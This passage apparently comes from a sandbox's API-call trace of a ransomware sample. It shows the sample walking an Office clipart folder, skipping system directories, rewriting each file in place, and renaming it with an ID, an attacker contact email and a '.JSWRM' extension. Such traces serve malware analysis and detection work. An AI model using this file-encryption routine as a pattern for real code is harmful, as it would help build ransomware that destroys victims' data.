lpWideCharStr="J0153091.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153091.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153091.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0085.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0085.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0085.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0085.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153091.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.456] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8136) returned 1 [0085.456] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1fc0) returned 0x205850 [0085.456] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1fc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1fc0, lpOverlapped=0x0) returned 1 [0085.515] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.516] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1fc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1fc0, lpOverlapped=0x0) returned 1 [0085.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0085.516] CloseHandle (hObject=0x314) returned 1 [0085.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0085.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0085.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0085.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0085.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0085.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0085.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.516] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153091.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153091.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153091.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0085.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0085.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0085.517] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x22b0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153093.WMF", cAlternateFileName="")) returned 1 [0085.517] lstrcmpiW (lpString1="J0153093.WMF", lpString2=".") returned 1 [0085.517] lstrcmpiW (lpString1="J0153093.WMF", lpString2="..") returned 1 [0085.517] lstrcmpiW (lpString1="J0153093.WMF", lpString2="...") returned 1 [0085.517] lstrcmpiW (lpString1="J0153093.WMF", lpString2="windows") returned -1 [0085.517] lstrcmpiW (lpString1="J0153093.WMF", lpString2="recovery") returned -1 [0085.518] lstrcmpiW (lpString1="J0153093.WMF", lpString2="perflogs") returned -1 [0085.518] lstrcmpiW (lpString1="J0153093.WMF", lpString2="documents and settings") returned 1 [0085.518] lstrcmpiW (lpString1="J0153093.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.518] lstrcmpiW (lpString1="J0153093.WMF", lpString2="system volume information") returned -1 [0085.518] lstrcmpiW (lpString1="J0153093.WMF", lpString2="msocache") returned -1 [0085.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0085.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153093.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153093.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153093.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0085.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0085.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153093.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153093.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153093.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0085.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0085.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0085.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0085.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153093.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.519] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8880) returned 1 [0085.519] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x22b0) returned 0x24d210 [0085.520] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x22b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x22b0, lpOverlapped=0x0) returned 1 [0085.533] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.533] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x22b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x22b0, lpOverlapped=0x0) returned 1 [0085.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.533] CloseHandle (hObject=0x314) returned 1 [0085.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0085.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0085.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0085.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0085.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0085.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0085.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0085.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0085.533] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153093.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153093.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153093.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0085.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0085.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0085.534] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe78, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153095.WMF", cAlternateFileName="")) returned 1 [0085.534] lstrcmpiW (lpString1="J0153095.WMF", lpString2=".") returned 1 [0085.534] lstrcmpiW (lpString1="J0153095.WMF", lpString2="..") returned 1 [0085.534] lstrcmpiW (lpString1="J0153095.WMF", lpString2="...") returned 1 [0085.534] lstrcmpiW (lpString1="J0153095.WMF", lpString2="windows") returned -1 [0085.534] lstrcmpiW (lpString1="J0153095.WMF", lpString2="recovery") returned -1 [0085.534] lstrcmpiW (lpString1="J0153095.WMF", lpString2="perflogs") returned -1 [0085.534] lstrcmpiW (lpString1="J0153095.WMF", lpString2="documents and settings") returned 1 [0085.534] lstrcmpiW (lpString1="J0153095.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.534] lstrcmpiW (lpString1="J0153095.WMF", lpString2="system volume information") returned -1 [0085.535] lstrcmpiW (lpString1="J0153095.WMF", lpString2="msocache") returned -1 [0085.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0085.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153095.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153095.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153095.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0085.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0085.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153095.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153095.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153095.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0085.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0085.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0085.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0085.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153095.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.539] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3704) returned 1 [0085.539] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe70) returned 0x23fc98 [0085.539] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xe70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xe70, lpOverlapped=0x0) returned 1 [0085.557] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.557] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xe70, lpOverlapped=0x0) returned 1 [0085.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0085.557] CloseHandle (hObject=0x314) returned 1 [0085.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0085.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0085.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0085.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0085.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0085.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0085.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0085.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0085.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0085.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0085.557] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153095.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153095.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153095.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0085.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0085.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0085.570] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153265.WMF", cAlternateFileName="")) returned 1 [0085.570] lstrcmpiW (lpString1="J0153265.WMF", lpString2=".") returned 1 [0085.570] lstrcmpiW (lpString1="J0153265.WMF", lpString2="..") returned 1 [0085.570] lstrcmpiW (lpString1="J0153265.WMF", lpString2="...") returned 1 [0085.570] lstrcmpiW (lpString1="J0153265.WMF", lpString2="windows") returned -1 [0085.570] lstrcmpiW (lpString1="J0153265.WMF", lpString2="recovery") returned -1 [0085.570] lstrcmpiW (lpString1="J0153265.WMF", lpString2="perflogs") returned -1 [0085.570] lstrcmpiW (lpString1="J0153265.WMF", lpString2="documents and settings") returned 1 [0085.570] lstrcmpiW (lpString1="J0153265.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.570] lstrcmpiW (lpString1="J0153265.WMF", lpString2="system volume information") returned -1 [0085.570] lstrcmpiW (lpString1="J0153265.WMF", lpString2="msocache") returned -1 [0085.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0085.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153265.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153265.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153265.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0085.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0085.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153265.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153265.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153265.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0085.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0085.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0085.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0085.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153265.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153265.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.573] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3008) returned 1 [0085.573] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbc0) returned 0x23fc98 [0085.573] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, 